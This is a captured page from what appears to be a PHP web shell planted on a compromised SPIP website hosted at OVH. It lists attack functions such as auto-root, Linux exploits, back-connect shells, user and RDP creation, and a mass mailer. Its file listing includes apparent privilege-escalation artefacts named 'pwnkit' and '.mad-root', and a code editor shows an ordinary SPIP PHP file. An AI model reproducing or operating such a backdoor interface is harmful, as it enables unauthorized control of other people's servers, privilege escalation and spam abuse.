Linux webm008.cluster115.gra.hosting.ovh.net 6.18.42-ovh-vps-grsec-zfs+ #1 SMP PREEMPT_DYNAMIC Wed Aug 5 15:59:48 CEST 2026 x86_64
Apache
: 10.115.20.8 | : 216.73.216.59
Cant Read [ /etc/named.conf ]
8.1.34
quelfutuu
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
home /
quelfutuu /
www /
prive /
echafaudage /
hierarchie /
[ HOME SHELL ]
Name
Size
Permission
Action
.mad-root
0
B
-rw-r--r--
objet.html
1.54
KB
-rw----r--
objet.sans_rubrique.html
336
B
-rw----r--
objet_fonctions.php
1.16
KB
-rw----r--
pwnkit
0
B
-rwxr-xr-x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : objet_fonctions.php
<?php /***************************************************************************\ * SPIP, Système de publication pour l'internet * * * * Copyright © avec tendresse depuis 2001 * * Arnaud Martin, Antoine Pitrou, Philippe Rivière, Emmanuel Saint-James * * * * Ce programme est un logiciel libre distribué sous licence GNU/GPL. * \***************************************************************************/ if (!defined('_ECRIRE_INC_VERSION')) { return; } /** * Tester le deplacement restreint ou non * de l'objet en fonction de son statut * * @param string $objet * @param string $statut * @return bool */ function deplacement_restreint($objet, $statut) { switch ($objet) { case 'rubrique': return (!$GLOBALS['connect_toutes_rubriques']); break; case 'article': case 'site': case 'syndic': case 'breve': return ($statut == 'publie'); break; default: return ($statut ? $statut == 'publie' : false); break; } return false; }
Close